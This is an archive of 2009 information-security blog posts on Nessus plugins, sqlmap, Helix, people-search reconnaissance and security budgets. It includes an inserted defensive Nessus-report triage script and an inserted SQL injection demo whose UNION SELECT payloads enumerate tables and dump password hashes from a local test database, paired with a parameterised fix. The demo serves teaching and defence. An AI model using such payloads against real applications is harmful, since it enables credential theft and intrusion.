Friday, February 27, 2009

People Search

I recently discovered a new tool called pipl for finding people online. It is remarkably accurate and aggregates information from a variety of sources, including Facebook, MySpace, Amazon and others. If you do security assessments or penetration testing, it is a very good reconnaissance (data gathering) tool.

Monday, February 16, 2009

Lesser known Nessus plugins

We all know that Nessus is a powerful vulnerability scanning and audit tool; it currently has more than 25,000 plugins covering various operating systems and applications. But which are the lesser known yet powerful plugins? Here I list five that are extremely useful in a corporate environment.

  1. Nikto plugin. With this plugin you can automate web application assessment across the organization, and its greatest strength is that the Nikto results are incorporated into the Nessus scan, so you can present them in one report alongside the other vulnerability findings.
  2. Installed software discovery. One of the challenges we face every day is identifying and preventing unauthorized software on desktops and servers. Nessus offers multiple plugins that identify installed software and build an inventory of it.
  3. Wireless SSID discovery. Do you know how many active wireless networks there are in your organization? More intriguing still, do you know how many of your desktops are associated with a wireless network? This plugin identifies the wireless networks each desktop or laptop is associated with. That is invaluable not only for identifying which devices are exposed to wireless threats but also for verifying compliance with internal policies and standards such as PCI.
  4. Auditing disabled USB drives. Many organizations have policies that prohibit the use of USB drives, but how do we ensure that every desktop and server complies? Nessus offers an .audit file that checks each scanned system to verify that USB storage is indeed locked down.
  5. Scanning for administrator access. Nessus offers various plugins that identify administrator privileges; some of the important ones are:
     • SMB blank admin password, which finds servers whose administrator account has a blank password.
     • Users in the "Domain Administrators" and local Administrators groups, which finds the users who are members of these important groups.
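Once the scan has run, the useful part is pulling these findings out of the report in one pass. The following is an added example (not code from the original post or from Tenable) that triages a Nessus .nessus (XML v2) export for three of the plugin classes above: blank SMB administrator passwords, wireless SSID associations, and a USB-storage compliance check from an .audit file. The report embedded in the script is constructed for the example; the plugin IDs 900001 to 900003, the plugin names and the output wording are placeholders, not real Nessus plugin numbers. The element layout (NessusClientData_v2 / Report / ReportHost / ReportItem) and the cm: compliance tags are the .nessus v2 format as I know it; check the tag names against your own export before relying on them.

```python
"""Triage a Nessus .nessus (XML v2) export for blank SMB admin passwords,
wireless SSID associations and a USB-storage compliance (.audit) result.

Added example, not code from the original post or from Tenable. The report
below is CONSTRUCTED: plugin IDs 900001-900003, plugin names and output text
are placeholders. The NessusClientData_v2 layout and the cm: compliance tags
are the .nessus v2 format as understood here (assumption; verify on a real
export).
"""
import re
import xml.etree.ElementTree as ET

CM_NS = "http://www.nessus.org/cm"  # namespace of compliance results (assumed)

SAMPLE_NESSUS = """<NessusClientData_v2 xmlns:cm="http://www.nessus.org/cm">
 <Report name="corp-lan">
  <ReportHost name="10.0.0.11">
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
       pluginID="900001" pluginName="SMB Blank Administrator Password" pluginFamily="Windows">
    <plugin_output>The 'Administrator' account has a blank password.</plugin_output>
   </ReportItem>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
       pluginID="900002" pluginName="Wireless SSID Discovery" pluginFamily="Windows">
    <plugin_output>Interface 'Wireless Network Connection' is associated with SSID : CoffeeShop-Free</plugin_output>
   </ReportItem>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="3"
       pluginID="900003" pluginName="Windows Compliance Checks" pluginFamily="Policy Compliance">
    <cm:compliance-check-name>USB storage driver disabled (USBSTOR Start = 4)</cm:compliance-check-name>
    <cm:compliance-result>FAILED</cm:compliance-result>
    <cm:compliance-actual-value>3</cm:compliance-actual-value>
    <cm:compliance-policy-value>4</cm:compliance-policy-value>
   </ReportItem>
  </ReportHost>
  <ReportHost name="10.0.0.12">
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="3"
       pluginID="900003" pluginName="Windows Compliance Checks" pluginFamily="Policy Compliance">
    <cm:compliance-check-name>USB storage driver disabled (USBSTOR Start = 4)</cm:compliance-check-name>
    <cm:compliance-result>PASSED</cm:compliance-result>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""

SSID_RE = re.compile(r"SSID\s*:\s*([^\r\n]+)")


def cm(tag):
    """Clark-notation name for a compliance (cm:) element."""
    return "{%s}%s" % (CM_NS, tag)


def parse_ssids(plugin_output):
    """Pull every 'SSID : <name>' occurrence out of a plugin's output text."""
    return [s.strip() for s in SSID_RE.findall(plugin_output)]


def triage(nessus_xml, usb_check_keyword="USB"):
    """Return {host: {"blank_admin": bool, "ssids": [...], "usb_audit": result}}.

    usb_audit is the cm:compliance-result string (e.g. "FAILED"/"PASSED"),
    or None when no matching compliance check ran against that host.
    """
    root = ET.fromstring(nessus_xml)
    hosts = {}
    for host in root.iter("ReportHost"):
        info = {"blank_admin": False, "ssids": [], "usb_audit": None}
        for item in host.iter("ReportItem"):
            pname = (item.get("pluginName") or "").lower()
            output = item.findtext("plugin_output") or ""
            if "blank administrator password" in pname:
                info["blank_admin"] = True
            elif "ssid" in pname:
                info["ssids"].extend(parse_ssids(output))
            elif item.get("pluginFamily") == "Policy Compliance":
                check = item.findtext(cm("compliance-check-name")) or ""
                if usb_check_keyword.lower() in check.lower():
                    info["usb_audit"] = item.findtext(cm("compliance-result"))
        hosts[host.get("name")] = info
    return hosts


def noncompliant_hosts(hosts):
    """Hosts violating any policy: blank admin password, wireless association,
    or USB storage still enabled."""
    return sorted(h for h, i in hosts.items()
                  if i["blank_admin"] or i["ssids"] or i["usb_audit"] == "FAILED")


if __name__ == "__main__":
    result = triage(SAMPLE_NESSUS)
    for h, i in result.items():
        print(h, i)
    print("non-compliant:", noncompliant_hosts(result))
```

One caveat worth keeping in mind when reading the output: a `usb_audit` of `None` means the compliance check never ran on that host (typically because the scan had no credentials for it), so it should be reported as unknown rather than counted as compliant.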

For more information, visit the Nessus plugin page.

Monday, February 9, 2009

Helix goes commercial

Just learned from the SANS GCFA mailing list that Helix, one of the most popular and powerful forensic and incident response live CDs, has gone commercial.

Friday, February 6, 2009

SQL Injection tool

A new version of sqlmap is out. It is an automatic SQL injection discovery and exploitation tool: once it identifies an injection vulnerability it enumerates database tables, usernames, passwords and so on.
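To show what that enumeration step actually does, here is an added example (not sqlmap's code) of the by-hand version of what sqlmap automates: a query built by string concatenation lets an attacker list table names through UNION SELECT and then dump a sensitive table, while the parameterised form of the same query rejects the payloads. The schema, rows and password hash are constructed for the demonstration, and SQLite is used, so table names come from sqlite_master where MySQL would use information_schema.

```python
"""By-hand version of what sqlmap automates against an injectable query.

Added example, not code from the sqlmap project. The products/users schema,
the rows and the password hash are CONSTRUCTED for this demonstration.
"""
import sqlite3


def build_db():
    """In-memory SQLite database standing in for the target application's DB."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99);
        INSERT INTO products VALUES (2, 'gadget', 19.99);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def lookup_vulnerable(conn, product_id):
    """Injectable: the caller-supplied value is pasted into the SQL text."""
    sql = "SELECT name, price FROM products WHERE id = " + str(product_id)
    return conn.execute(sql).fetchall()


def lookup_safe(conn, product_id):
    """Parameterised: the value is bound as data and never parsed as SQL."""
    sql = "SELECT name, price FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


# Payloads of the kind sqlmap generates once it has found the injection point.
# The UNION must match the column count of the original SELECT (two here);
# sqlmap probes that count with ORDER BY / NULL padding before dumping.
ENUM_TABLES = "0 UNION SELECT name, NULL FROM sqlite_master WHERE type = 'table'"
DUMP_USERS = "0 UNION SELECT username, password_hash FROM users"


def enumerate_tables(conn):
    """Step 1 of enumeration: table names leak through the product listing."""
    return sorted(row[0] for row in lookup_vulnerable(conn, ENUM_TABLES))


def dump_users(conn):
    """Step 2: with the table name known, pull usernames and password hashes."""
    return lookup_vulnerable(conn, DUMP_USERS)


if __name__ == "__main__":
    db = build_db()
    print("tables:", enumerate_tables(db))
    print("users:", dump_users(db))
    # The same payload against the parameterised query matches nothing.
    print("parameterised:", lookup_safe(db, ENUM_TABLES))
```

The point of the parameterised variant is not that it filters the payload but that the bound value is compared to the integer `id` column as data; the attacker's text never reaches the SQL parser, so there is no injection point for sqlmap to find.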

I have always been fascinated by the economics of information security: what prompts people to write and propagate malware? Almost all of today's malware is financially motivated, and its authors are finding new ways and methods in these difficult economic conditions.

McAfee recently released its Virtual Criminology Report, its annual study of global cybercrime, which includes this and other findings. Monitoring and awareness are key to protecting an organization's information assets.

Monday, February 2, 2009

Information Security in a down economy

Many organizations are reducing their overall budgets, and new projects are being postponed or suspended. So what can we as corporate information security professionals do to maintain or enhance security levels? Some points to consider:

  • Renegotiate support contracts to get better pricing.
  • Find open source alternatives. For example: replace commercial host monitoring agents with OSSEC agents, install Snort on an old, unused server, replace commercial vulnerability assessment scanners with open source alternatives, and so on.
  • Tune the existing tools to get maximum benefit from them.
  • Inventory the infrastructure and perform a risk assessment to find out whether you are paying attention to the right networks, systems, applications and data.
  • Prove the value of information security to the organization to get whatever funding you can.
  • Demonstrate that the previous investments are paying off.
  • Get involved in the business activities and propose information security solutions as part of the business projects.
  • Attend webcasts and listen to podcasts as an alternative to paid training, so you keep learning in the field of information security.